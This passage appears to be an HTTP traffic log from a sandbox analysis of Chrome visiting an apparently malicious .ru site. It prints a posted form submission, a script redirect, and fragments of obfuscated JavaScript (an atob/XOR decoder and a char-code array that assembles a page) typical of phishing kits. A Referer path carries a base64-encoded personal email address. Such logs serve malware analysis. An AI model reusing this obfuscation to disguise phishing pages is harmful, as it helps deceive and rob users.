                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 40
                                                                                                                                                                                    Cache-Control: max-age=0
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    Origin: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29t
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:09 UTC40OUTData Raw: 49 49 6c 44 78 78 6b 55 76 66 4e 6e 63 62 77 3d 76 69 6c 61 69 6e 36 36 36 26 66 50 43 6a 41 78 55 51 62 5a 62 3d 6c 65
                                                                                                                                                                                    Data Ascii: IIlDxxkUvfNncbw=vilain666&fPCjAxUQbZb=le
                                                                                                                                                                                    2024-01-26 13:42:12 UTC731INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:12 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SvL%2Fx5kP7cGXQlXEqPOkA6vpu68XIl3JwYisyohhHxQI2l2czOdCQGe1fZoXBJC2wkYwvQnN9RPHLRBykah5h4NeFefdcJYlRDvHdueaz2df6ZPHsBiB9%2BqelylDSpwmIsXuLYKA7uPN%2FKOh7jRyyebjTdA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d755b7e1387-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:12 UTC80INData Raw: 34 61 0d 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 39 32 35 6f 53 6c 43 71 68 42 46 35 36 6d 56 3f 30 41 41 5a 66 30 42 50 51 64 31 69 56 49 3f 65 72 22 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                                                                                                                                                    Data Ascii: 4a<script>window.location.href="925oSlCqhBF56mV?0AAZf0BPQd1iVI?er";</script>
                                                                                                                                                                                    2024-01-26 13:42:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    60192.168.2.1649807104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:12 UTC855OUTGET /VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?er HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/30VyqDe0V3
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:12 UTC736INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:12 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GNHKHKeBPv28krxw0T6kaXNX72X7kbpa3Rip%2BN1C731Q719vgZvNsUYUSP4sl56UYtdJf4Tatq7zSlfPmlDueSkLEXZoajauMNDaKOf7Ty2zgtq5nTCdi%2Fu6eL8We7Uh3y99zdOP4MUJtF7SHnc2jZZbphw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d892ddd4519-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:12 UTC576INData Raw: 32 33 39 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 76 61 72 20 4d 6d 52 41 49 56 47 5a 52 6c 72 78 4f 20 3d 20 27 75 56 50 42 6a 61 57 78 61 42 45 7a 76 72 27 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 6a 7a 6f 61 61 6e 74 4a 47 28 62 6c 44 49 4b 53 69 43 6a 2c 20 61 52 4c 56 57 63 41 5a 69 4f 77 75 29 20 7b 0d 0a 09 6c 65 74 20 64 71 59 48 78 69 52 5a 4d 63 49 54 61 68 6e 20 3d 20 27 27 3b 0d 0a 09 62 6c 44 49 4b 53 69 43 6a 20 3d 20 61 74 6f 62 28 62 6c 44 49 4b 53 69 43 6a 29 3b 0d 0a 09 6c 65 74 20 74 4e 49 52 75 54 50 6b 5a 20 3d 20 61 52 4c 56 57 63 41 5a 69 4f 77 75 2e 6c 65 6e 67 74 68 3b 0d 0a 0d 0a 09 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 62 6c 44 49 4b 53 69 43 6a 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 09 09 64 71 59 48 78
                                                                                                                                                                                    Data Ascii: 239<script>var MmRAIVGZRlrxO = 'uVPBjaWxaBEzvr';function jzoaantJG(blDIKSiCj, aRLVWcAZiOwu) {let dqYHxiRZMcITahn = '';blDIKSiCj = atob(blDIKSiCj);let tNIRuTPkZ = aRLVWcAZiOwu.length;for (let i = 0; i < blDIKSiCj.length; i++) {dqYHx
                                                                                                                                                                                    2024-01-26 13:42:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    61192.168.2.1649809104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:13 UTC697OUTGET /VyRsmGftiIlOxrabXBIOtQtS/0AAZf0BPQd1iVI?er HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?er
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:13 UTC736INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:13 GMT
                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2h5M3fQUL7CsGkNW0HiAFMHcSMUgGGCSFGjgh2JjuO2%2BMXh4AZELn2WK3V3tcgVicUP5ObOqrgQI3%2B70BoJSbK9pf2YFQIx1Zu%2B9oS1EGLEbeqSSqXQrH4jOkroHK2hfzFLMUIKch2CjKeag13vQeD3mB8M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d8bbda17bc3-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:13 UTC633INData Raw: 37 63 63 65 0d 0a 76 61 72 20 67 78 75 75 4b 72 77 58 20 3d 20 6e 65 77 20 41 72 72 61 79 3b 0a 67 78 75 75 4b 72 77 58 5b 30 5d 20 3d 20 36 30 3b 0a 67 78 75 75 4b 72 77 58 5b 31 5d 20 3d 20 33 33 3b 0a 67 78 75 75 4b 72 77 58 5b 32 5d 20 3d 20 36 38 3b 0a 67 78 75 75 4b 72 77 58 5b 33 5d 20 3d 20 37 39 3b 0a 67 78 75 75 4b 72 77 58 5b 34 5d 20 3d 20 36 37 3b 0a 67 78 75 75 4b 72 77 58 5b 35 5d 20 3d 20 38 34 3b 0a 67 78 75 75 4b 72 77 58 5b 36 5d 20 3d 20 38 39 3b 0a 67 78 75 75 4b 72 77 58 5b 37 5d 20 3d 20 38 30 3b 0a 67 78 75 75 4b 72 77 58 5b 38 5d 20 3d 20 36 39 3b 0a 67 78 75 75 4b 72 77 58 5b 39 5d 20 3d 20 33 32 3b 0a 67 78 75 75 4b 72 77 58 5b 31 30 5d 20 3d 20 31 30 34 3b 0a 67 78 75 75 4b 72 77 58 5b 31 31 5d 20 3d 20 31 31 36 3b 0a 67 78 75
                                                                                                                                                                                    Data Ascii: 7ccevar gxuuKrwX = new Array;gxuuKrwX[0] = 60;gxuuKrwX[1] = 33;gxuuKrwX[2] = 68;gxuuKrwX[3] = 79;gxuuKrwX[4] = 67;gxuuKrwX[5] = 84;gxuuKrwX[6] = 89;gxuuKrwX[7] = 80;gxuuKrwX[8] = 69;gxuuKrwX[9] = 32;gxuuKrwX[10] = 104;gxuuKrwX[11] = 116;gxu
                                                                                                                                                                                    2024-01-26 13:42:13 UTC1369INData Raw: 5b 33 31 5d 20 3d 20 31 30 38 3b 0a 67 78 75 75 4b 72 77 58 5b 33 32 5d 20 3d 20 39 37 3b 0a 67 78 75 75 4b 72 77 58 5b 33 33 5d 20 3d 20 31 31 30 3b 0a 67 78 75 75 4b 72 77 58 5b 33 34 5d 20 3d 20 31 30 33 3b 0a 67 78 75 75 4b 72 77 58 5b 33 35 5d 20 3d 20 36 31 3b 0a 67 78 75 75 4b 72 77 58 5b 33 36 5d 20 3d 20 33 34 3b 0a 67 78 75 75 4b 72 77 58 5b 33 37 5d 20 3d 20 31 30 31 3b 0a 67 78 75 75 4b 72 77 58 5b 33 38 5d 20 3d 20 31 31 30 3b 0a 67 78 75 75 4b 72 77 58 5b 33 39 5d 20 3d 20 33 34 3b 0a 67 78 75 75 4b 72 77 58 5b 34 30 5d 20 3d 20 36 32 3b 0a 67 78 75 75 4b 72 77 58 5b 34 31 5d 20 3d 20 36 30 3b 0a 67 78 75 75 4b 72 77 58 5b 34 32 5d 20 3d 20 31 30 34 3b 0a 67 78 75 75 4b 72 77 58 5b 34 33 5d 20 3d 20 31 30 31 3b 0a 67 78 75 75 4b 72 77 58 5b
                                                                                                                                                                                    Data Ascii: [31] = 108;gxuuKrwX[32] = 97;gxuuKrwX[33] = 110;gxuuKrwX[34] = 103;gxuuKrwX[35] = 61;gxuuKrwX[36] = 34;gxuuKrwX[37] = 101;gxuuKrwX[38] = 110;gxuuKrwX[39] = 34;gxuuKrwX[40] = 62;gxuuKrwX[41] = 60;gxuuKrwX[42] = 104;gxuuKrwX[43] = 101;gxuuKrwX[
                                                                                                                                                                                    2024-01-26 13:42:13 UTC1369INData Raw: 67 78 75 75 4b 72 77 58 5b 31 30 31 5d 20 3d 20 31 31 36 3b 0a 67 78 75 75 4b 72 77 58 5b 31 30 32 5d 20 3d 20 31 30 35 3b 0a 67 78 75 75 4b 72 77 58 5b 31 30 33 5d 20 3d 20 39 37 3b 0a 67 78 75 75 4b 72 77 58 5b 31 30 34 5d 20 3d 20 31 30 38 3b 0a 67 78 75 75 4b 72 77 58 5b 31 30 35 5d 20 3d 20 34 35 3b 0a 67 78 75 75 4b 72 77 58 5b 31 30 36 5d 20 3d 20 31 31 35 3b 0a 67 78 75 75 4b 72 77 58 5b 31 30 37 5d 20 3d 20 39 39 3b 0a 67 78 75 75 4b 72 77 58 5b 31 30 38 5d 20 3d 20 39 37 3b 0a 67 78 75 75 4b 72 77 58 5b 31 30 39 5d 20 3d 20 31 30 38 3b 0a 67 78 75 75 4b 72 77 58 5b 31 31 30 5d 20 3d 20 31 30 31 3b 0a 67 78 75 75 4b 72 77 58 5b 31 31 31 5d 20 3d 20 36 31 3b 0a 67 78 75 75 4b 72 77 58 5b 31 31 32 5d 20 3d 20 34 39 3b 0a 67 78 75 75 4b 72 77 58 5b
                                                                                                                                                                                    Data Ascii: gxuuKrwX[101] = 116;gxuuKrwX[102] = 105;gxuuKrwX[103] = 97;gxuuKrwX[104] = 108;gxuuKrwX[105] = 45;gxuuKrwX[106] = 115;gxuuKrwX[107] = 99;gxuuKrwX[108] = 97;gxuuKrwX[109] = 108;gxuuKrwX[110] = 101;gxuuKrwX[111] = 61;gxuuKrwX[112] = 49;gxuuKrwX[
                                                                                                                                                                                    2024-01-26 13:42:13 UTC1369INData Raw: 31 30 3b 0a 67 78 75 75 4b 72 77 58 5b 31 36 38 5d 20 3d 20 31 32 31 3b 0a 67 78 75 75 4b 72 77 58 5b 31 36 39 5d 20 3d 20 36 38 3b 0a 67 78 75 75 4b 72 77 58 5b 31 37 30 5d 20 3d 20 31 30 30 3b 0a 67 78 75 75 4b 72 77 58 5b 31 37 31 5d 20 3d 20 39 38 3b 0a 67 78 75 75 4b 72 77 58 5b 31 37 32 5d 20 3d 20 31 31 31 3b 0a 67 78 75 75 4b 72 77 58 5b 31 37 33 5d 20 3d 20 33 34 3b 0a 67 78 75 75 4b 72 77 58 5b 31 37 34 5d 20 3d 20 33 32 3b 0a 67 78 75 75 4b 72 77 58 5b 31 37 35 5d 20 3d 20 31 31 34 3b 0a 67 78 75 75 4b 72 77 58 5b 31 37 36 5d 20 3d 20 31 30 31 3b 0a 67 78 75 75 4b 72 77 58 5b 31 37 37 5d 20 3d 20 31 30 38 3b 0a 67 78 75 75 4b 72 77 58 5b 31 37 38 5d 20 3d 20 36 31 3b 0a 67 78 75 75 4b 72 77 58 5b 31 37 39 5d 20 3d 20 33 34 3b 0a 67 78 75 75 4b
                                                                                                                                                                                    Data Ascii: 10;gxuuKrwX[168] = 121;gxuuKrwX[169] = 68;gxuuKrwX[170] = 100;gxuuKrwX[171] = 98;gxuuKrwX[172] = 111;gxuuKrwX[173] = 34;gxuuKrwX[174] = 32;gxuuKrwX[175] = 114;gxuuKrwX[176] = 101;gxuuKrwX[177] = 108;gxuuKrwX[178] = 61;gxuuKrwX[179] = 34;gxuuK
                                                                                                                                                                                    2024-01-26 13:42:13 UTC1369INData Raw: 4b 72 77 58 5b 32 33 34 5d 20 3d 20 31 31 38 3b 0a 67 78 75 75 4b 72 77 58 5b 32 33 35 5d 20 3d 20 35 32 3b 0a 67 78 75 75 4b 72 77 58 5b 32 33 36 5d 20 3d 20 37 38 3b 0a 67 78 75 75 4b 72 77 58 5b 32 33 37 5d 20 3d 20 38 34 3b 0a 67 78 75 75 4b 72 77 58 5b 32 33 38 5d 20 3d 20 34 37 3b 0a 67 78 75 75 4b 72 77 58 5b 32 33 39 5d 20 3d 20 35 35 3b 0a 67 78 75 75 4b 72 77 58 5b 32 34 30 5d 20 3d 20 37 36 3b 0a 67 78 75 75 4b 72 77 58 5b 32 34 31 5d 20 3d 20 38 39 3b 0a 67 78 75 75 4b 72 77 58 5b 32 34 32 5d 20 3d 20 31 30 32 3b 0a 67 78 75 75 4b 72 77 58 5b 32 34 33 5d 20 3d 20 38 34 3b 0a 67 78 75 75 4b 72 77 58 5b 32 34 34 5d 20 3d 20 38 35 3b 0a 67 78 75 75 4b 72 77 58 5b 32 34 35 5d 20 3d 20 31 32 32 3b 0a 67 78 75 75 4b 72 77 58 5b 32 34 36 5d 20 3d 20
                                                                                                                                                                                    Data Ascii: KrwX[234] = 118;gxuuKrwX[235] = 52;gxuuKrwX[236] = 78;gxuuKrwX[237] = 84;gxuuKrwX[238] = 47;gxuuKrwX[239] = 55;gxuuKrwX[240] = 76;gxuuKrwX[241] = 89;gxuuKrwX[242] = 102;gxuuKrwX[243] = 84;gxuuKrwX[244] = 85;gxuuKrwX[245] = 122;gxuuKrwX[246] =
                                                                                                                                                                                    2024-01-26 13:42:13 UTC1369INData Raw: 20 31 32 30 3b 0a 67 78 75 75 4b 72 77 58 5b 33 30 31 5d 20 3d 20 31 30 31 3b 0a 67 78 75 75 4b 72 77 58 5b 33 30 32 5d 20 3d 20 31 30 30 3b 0a 67 78 75 75 4b 72 77 58 5b 33 30 33 5d 20 3d 20 35 39 3b 0a 67 78 75 75 4b 72 77 58 5b 33 30 34 5d 20 3d 20 39 38 3b 0a 67 78 75 75 4b 72 77 58 5b 33 30 35 5d 20 3d 20 31 31 31 3b 0a 67 78 75 75 4b 72 77 58 5b 33 30 36 5d 20 3d 20 31 31 36 3b 0a 67 78 75 75 4b 72 77 58 5b 33 30 37 5d 20 3d 20 31 31 36 3b 0a 67 78 75 75 4b 72 77 58 5b 33 30 38 5d 20 3d 20 31 31 31 3b 0a 67 78 75 75 4b 72 77 58 5b 33 30 39 5d 20 3d 20 31 30 39 3b 0a 67 78 75 75 4b 72 77 58 5b 33 31 30 5d 20 3d 20 35 38 3b 0a 67 78 75 75 4b 72 77 58 5b 33 31 31 5d 20 3d 20 34 38 3b 0a 67 78 75 75 4b 72 77 58 5b 33 31 32 5d 20 3d 20 31 32 35 3b 0a 67
                                                                                                                                                                                    Data Ascii: 120;gxuuKrwX[301] = 101;gxuuKrwX[302] = 100;gxuuKrwX[303] = 59;gxuuKrwX[304] = 98;gxuuKrwX[305] = 111;gxuuKrwX[306] = 116;gxuuKrwX[307] = 116;gxuuKrwX[308] = 111;gxuuKrwX[309] = 109;gxuuKrwX[310] = 58;gxuuKrwX[311] = 48;gxuuKrwX[312] = 125;g
                                                                                                                                                                                    2024-01-26 13:42:13 UTC1369INData Raw: 36 37 5d 20 3d 20 35 33 3b 0a 67 78 75 75 4b 72 77 58 5b 33 36 38 5d 20 3d 20 34 34 3b 0a 67 78 75 75 4b 72 77 58 5b 33 36 39 5d 20 3d 20 34 36 3b 0a 67 78 75 75 4b 72 77 58 5b 33 37 30 5d 20 3d 20 35 30 3b 0a 67 78 75 75 4b 72 77 58 5b 33 37 31 5d 20 3d 20 34 31 3b 0a 67 78 75 75 4b 72 77 58 5b 33 37 32 5d 20 3d 20 35 39 3b 0a 67 78 75 75 4b 72 77 58 5b 33 37 33 5d 20 3d 20 31 31 32 3b 0a 67 78 75 75 4b 72 77 58 5b 33 37 34 5d 20 3d 20 39 37 3b 0a 67 78 75 75 4b 72 77 58 5b 33 37 35 5d 20 3d 20 31 30 30 3b 0a 67 78 75 75 4b 72 77 58 5b 33 37 36 5d 20 3d 20 31 30 30 3b 0a 67 78 75 75 4b 72 77 58 5b 33 37 37 5d 20 3d 20 31 30 35 3b 0a 67 78 75 75 4b 72 77 58 5b 33 37 38 5d 20 3d 20 31 31 30 3b 0a 67 78 75 75 4b 72 77 58 5b 33 37 39 5d 20 3d 20 31 30 33 3b
                                                                                                                                                                                    Data Ascii: 67] = 53;gxuuKrwX[368] = 44;gxuuKrwX[369] = 46;gxuuKrwX[370] = 50;gxuuKrwX[371] = 41;gxuuKrwX[372] = 59;gxuuKrwX[373] = 112;gxuuKrwX[374] = 97;gxuuKrwX[375] = 100;gxuuKrwX[376] = 100;gxuuKrwX[377] = 105;gxuuKrwX[378] = 110;gxuuKrwX[379] = 103;
                                                                                                                                                                                    2024-01-26 13:42:13 UTC1369INData Raw: 75 75 4b 72 77 58 5b 34 33 34 5d 20 3d 20 39 39 3b 0a 67 78 75 75 4b 72 77 58 5b 34 33 35 5d 20 3d 20 31 30 37 3b 0a 67 78 75 75 4b 72 77 58 5b 34 33 36 5d 20 3d 20 31 30 33 3b 0a 67 78 75 75 4b 72 77 58 5b 34 33 37 5d 20 3d 20 31 31 34 3b 0a 67 78 75 75 4b 72 77 58 5b 34 33 38 5d 20 3d 20 31 31 31 3b 0a 67 78 75 75 4b 72 77 58 5b 34 33 39 5d 20 3d 20 31 31 37 3b 0a 67 78 75 75 4b 72 77 58 5b 34 34 30 5d 20 3d 20 31 31 30 3b 0a 67 78 75 75 4b 72 77 58 5b 34 34 31 5d 20 3d 20 31 30 30 3b 0a 67 78 75 75 4b 72 77 58 5b 34 34 32 5d 20 3d 20 34 35 3b 0a 67 78 75 75 4b 72 77 58 5b 34 34 33 5d 20 3d 20 39 39 3b 0a 67 78 75 75 4b 72 77 58 5b 34 34 34 5d 20 3d 20 31 30 38 3b 0a 67 78 75 75 4b 72 77 58 5b 34 34 35 5d 20 3d 20 31 30 35 3b 0a 67 78 75 75 4b 72 77 58
                                                                                                                                                                                    Data Ascii: uuKrwX[434] = 99;gxuuKrwX[435] = 107;gxuuKrwX[436] = 103;gxuuKrwX[437] = 114;gxuuKrwX[438] = 111;gxuuKrwX[439] = 117;gxuuKrwX[440] = 110;gxuuKrwX[441] = 100;gxuuKrwX[442] = 45;gxuuKrwX[443] = 99;gxuuKrwX[444] = 108;gxuuKrwX[445] = 105;gxuuKrwX
                                                                                                                                                                                    2024-01-26 13:42:13 UTC1369INData Raw: 4b 72 77 58 5b 35 30 30 5d 20 3d 20 31 31 34 3b 0a 67 78 75 75 4b 72 77 58 5b 35 30 31 5d 20 3d 20 31 30 32 3b 0a 67 78 75 75 4b 72 77 58 5b 35 30 32 5d 20 3d 20 31 30 38 3b 0a 67 78 75 75 4b 72 77 58 5b 35 30 33 5d 20 3d 20 31 31 31 3b 0a 67 78 75 75 4b 72 77 58 5b 35 30 34 5d 20 3d 20 31 31 39 3b 0a 67 78 75 75 4b 72 77 58 5b 35 30 35 5d 20 3d 20 35 38 3b 0a 67 78 75 75 4b 72 77 58 5b 35 30 36 5d 20 3d 20 31 31 38 3b 0a 67 78 75 75 4b 72 77 58 5b 35 30 37 5d 20 3d 20 31 30 35 3b 0a 67 78 75 75 4b 72 77 58 5b 35 30 38 5d 20 3d 20 31 31 35 3b 0a 67 78 75 75 4b 72 77 58 5b 35 30 39 5d 20 3d 20 31 30 35 3b 0a 67 78 75 75 4b 72 77 58 5b 35 31 30 5d 20 3d 20 39 38 3b 0a 67 78 75 75 4b 72 77 58 5b 35 31 31 5d 20 3d 20 31 30 38 3b 0a 67 78 75 75 4b 72 77 58 5b
                                                                                                                                                                                    Data Ascii: KrwX[500] = 114;gxuuKrwX[501] = 102;gxuuKrwX[502] = 108;gxuuKrwX[503] = 111;gxuuKrwX[504] = 119;gxuuKrwX[505] = 58;gxuuKrwX[506] = 118;gxuuKrwX[507] = 105;gxuuKrwX[508] = 115;gxuuKrwX[509] = 105;gxuuKrwX[510] = 98;gxuuKrwX[511] = 108;gxuuKrwX[
                                                                                                                                                                                    2024-01-26 13:42:13 UTC1369INData Raw: 5d 20 3d 20 31 31 32 3b 0a 67 78 75 75 4b 72 77 58 5b 35 36 37 5d 20 3d 20 39 37 3b 0a 67 78 75 75 4b 72 77 58 5b 35 36 38 5d 20 3d 20 31 31 30 3b 0a 67 78 75 75 4b 72 77 58 5b 35 36 39 5d 20 3d 20 33 32 3b 0a 67 78 75 75 4b 72 77 58 5b 35 37 30 5d 20 3d 20 31 32 33 3b 0a 67 78 75 75 4b 72 77 58 5b 35 37 31 5d 20 3d 20 39 39 3b 0a 67 78 75 75 4b 72 77 58 5b 35 37 32 5d 20 3d 20 31 31 31 3b 0a 67 78 75 75 4b 72 77 58 5b 35 37 33 5d 20 3d 20 31 30 38 3b 0a 67 78 75 75 4b 72 77 58 5b 35 37 34 5d 20 3d 20 31 31 31 3b 0a 67 78 75 75 4b 72 77 58 5b 35 37 35 5d 20 3d 20 31 31 34 3b 0a 67 78 75 75 4b 72 77 58 5b 35 37 36 5d 20 3d 20 35 38 3b 0a 67 78 75 75 4b 72 77 58 5b 35 37 37 5d 20 3d 20 33 32 3b 0a 67 78 75 75 4b 72 77 58 5b 35 37 38 5d 20 3d 20 33 35 3b 0a
                                                                                                                                                                                    Data Ascii: ] = 112;gxuuKrwX[567] = 97;gxuuKrwX[568] = 110;gxuuKrwX[569] = 32;gxuuKrwX[570] = 123;gxuuKrwX[571] = 99;gxuuKrwX[572] = 111;gxuuKrwX[573] = 108;gxuuKrwX[574] = 111;gxuuKrwX[575] = 114;gxuuKrwX[576] = 58;gxuuKrwX[577] = 32;gxuuKrwX[578] = 35;


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    62192.168.2.1649811104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:14 UTC716OUTGET /VyRsmGftiIlOxrabXBIOtQtS/69MiXSEC36w/1JnZnyDdbo HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?er
